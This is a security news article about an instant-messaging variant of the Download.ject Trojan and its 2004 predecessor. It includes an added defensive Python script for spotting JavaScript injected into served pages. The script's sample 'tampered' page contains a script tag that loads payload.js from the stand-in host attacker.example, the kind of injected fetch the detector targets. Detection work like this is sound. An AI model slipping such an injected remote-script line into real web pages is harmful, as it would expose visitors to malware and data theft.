
New AIM Trojan steals financial data

Bill Brenner

A new variant of Download.ject is in the wild, using instant messaging to spread. Like the first strain, this Trojan horse is designed to open backdoors and steal financial data, according to PivX Solutions. The Newport Beach, Calif.-based security firm was still analyzing the scope of the threat Thursday afternoon.

"This one has most of the characteristics of the first Download.ject," said Thor Larholm, senior security researcher with PivX. "The difference is that this one uses instant messaging to spread. If you receive the message and click the link, you're infected. Like the first attack, this one also appears to be financially motivated."

Larholm said it arrives as a harmless-looking instant message on AIM or ICQ that reads, "My personal home page http://XXXXXXX.X-XXXXXX.XXX/." Once the user clicks the link, Internet Explorer opens a malicious Web site that infects the machine through several Internet Explorer vulnerabilities. The first thing users of infected machines will notice is a modified home page and search pane in the browser: in place of the user's preferred home page is a site called TargetSearch, along with several browser windows displaying adult advertisements and referral links. PivX has notified antivirus vendors so they can create signatures for the threat, Larholm said.

The first Download.ject attack in June compromised machines running Internet Explorer on Windows and servers running Microsoft Internet Information Services (IIS) 5.0. Microsoft concluded the assault was a targeted, manual attack by individuals or entities against a specific server. The Trojan used compromised sites to append JavaScript to the bottom of Web pages. When executed, the JavaScript accesses a file hosted on another server believed to contain malicious code that could affect the end user's system.
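The injection pattern described above (script appended to the bottom of served pages that pulls code from a second server) can be triaged from the HTML itself. The following Python is an added example written for this page; it is not code from the article, from PivX or from Microsoft. It flags two traits: a `<script>` tag that sits after the document's closing `</html>` tag, and a script `src` whose host differs from the host serving the page. The sample pages and the host names `www.example.com` and `attacker.example` are constructed for the example.

```python
"""Flag JavaScript appended to the tail of a served page or loaded from a foreign host.

Added example for this article, not vendor tooling. Sample pages and host names are
constructed; attacker.example is a reserved example domain, not a real site.
"""
import re
from urllib.parse import urlparse

# Opening <script ...> tags and a src attribute inside one; both case-insensitive.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
CLOSING_HTML = re.compile(r"</html\s*>", re.IGNORECASE)


def script_tags(html_text):
    """Yield (byte offset, src or None) for every <script> opening tag in the page."""
    for match in SCRIPT_TAG.finditer(html_text):
        src_match = SRC_ATTR.search(match.group(0))
        yield match.start(), (src_match.group(1) if src_match else None)


def foreign_host(src, page_host):
    """Return the host a script src loads from when it is not page_host, else None.

    Relative paths (/js/site.js) have no host and are treated as local;
    protocol-relative URLs (//host/x.js) are resolved like absolute ones.
    """
    if not src:
        return None
    if src.startswith("//"):
        src = "http:" + src
    host = urlparse(src).hostname
    if host and host.lower() != page_host.lower():
        return host
    return None


def find_injected_scripts(html_text, page_host):
    """Return a finding per script that is appended after </html> or loads from another host.

    Each finding is {"offset": int, "src": str or None, "reasons": [str, ...]}.
    """
    closings = list(CLOSING_HTML.finditer(html_text))
    end_of_doc = closings[-1].end() if closings else None
    findings = []
    for offset, src in script_tags(html_text):
        reasons = []
        if end_of_doc is not None and offset >= end_of_doc:
            reasons.append("appended after </html>")
        host = foreign_host(src, page_host)
        if host:
            reasons.append("loads from foreign host " + host)
        if reasons:
            findings.append({"offset": offset, "src": src, "reasons": reasons})
    return findings


# Constructed sample pages: a clean page, and the same page with a script appended
# after </html> that fetches code from a different server.
CLEAN_PAGE = (
    '<html><head><script src="/js/site.js"></script></head>'
    "<body>Welcome</body></html>\n"
)
TAMPERED_PAGE = CLEAN_PAGE + '<script src="http://attacker.example/payload.js"></script>\n'

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, find_injected_scripts(page, "www.example.com"))
```

Run it against pages pulled from your own Web server (not from a browser, which may already have been hijacked) and supply the host name the server answers for. The check is a triage aid, not proof: a script that is injected inside the body, or assembled at runtime from pieces, will only be caught by the foreign-host rule, and an attacker who serves the second stage from the compromised host itself will trip neither rule.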

The HangUP Team, a for-profit malicious code group from Russia, is believed responsible for the first Download.ject and for the recent rash of Korgo worms that attacked the LSASS vulnerability Microsoft outlined in Security Bulletin MS04-011. Experts believe the goal of the attack was to deliver malicious code to visitors of an affected Web site that could be used to steal credit card and other information that would then be sold to organized identity theft groups.

It's unclear if the HangUP Team is behind the latest variant.
